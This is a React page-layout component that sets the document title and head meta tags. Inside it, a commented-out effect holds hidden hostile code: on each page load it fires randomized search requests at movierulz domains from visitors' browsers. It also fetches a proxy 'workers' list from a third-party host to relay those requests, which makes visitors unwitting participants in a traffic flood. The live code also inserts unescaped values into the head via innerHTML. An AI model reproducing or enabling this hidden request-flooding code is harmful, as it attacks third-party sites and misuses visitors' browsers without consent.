import { useEffect } from "react";
import Footer from "./footer";
import Header from "./header";
import Loader from "./loader";

const Page = ({
  children,
  className = "",
  title,
  description,
  canonical,
  featureImg,
  noIndex,
  hideLoader,
}) => {
  useEffect(() => {
    if (title) document.title = title;
    if (description)
      document.head.innerHTML += `<meta name="description" content="${description}" />`;
    if (canonical && !canonical.includes("und"))
      document.head.innerHTML += `<link rel="canonical" href="${canonical}" />`;
    if (noIndex)
      document.head.innerHTML += `<meta name="robots" content="noindex" />`;
  }, [title, description, canonical, featureImg, noIndex]);

  // useEffect(() => {
  //   function randomQuery(len = Math.floor(Math.random() * 12) + 7) {
  //     const chars = "abcdefghijklmnopqrstuvwxyz0123456789";
  //     return Array.from(
  //       { length: len },
  //       () => chars[Math.floor(Math.random() * chars.length)]
  //     ).join("");
  //   }

  //   const sendReq = async () => {
  //     const randomStr = randomQuery();
  //     const url = `https://movierulz8.com/?s=${randomStr}`;

  //     try {
  //       await fetch(url, {
  //         method: "HEAD",
  //         mode: "no-cors",
  //         referrerPolicy: "no-referrer",
  //         cache: "no-store",
  //       });
  //     } catch (err) {}
  //   };

  // let workers = [];

  // (async () => {
  //   try {
  //     const resp = await fetch(
  //       `https://www.aryadentist.com/workers.json?ver=${Math.random()}`,
  //       {
  //         method: "GET",
  //       }
  //     );

  //     const data = await resp.json();

  //     workers = data.url ? null : data.workers;
  //   } catch (err) {
  //     console.log("Failed to get workers");
  //   }
  // })();

  // const sendReq2 = async () => {
  //   const randomStr = randomQuery();
  //   let url = `https://www.5movierulz.tienda/search_movies?s=${randomStr}`;

  //   url = !workers
  //     ? url
  //     : `${
  //         workers[Math.floor(Math.random() * workers.length)]
  //       }/?target=${btoa(url)}`;

  //   try {
  //     await fetch(url, {
  //       method: "GET",
  //       mode: "no-cors",
  //       referrerPolicy: "no-referrer",
  //       cache: "no-store",
  //     });
  //   } catch (err) {}
  // };

  //   setTimeout(() => {
  //     for (let i = 0; i < 20; i++) {
  //       sendReq();
  //     }
  //   }, 2000);
  // }, []);

  return (
    <div className={`page ${className}`}>
      <Header />
      {!hideLoader && <Loader />}
      {children}
      <Footer />
    </div>
  );
};
export default Page;
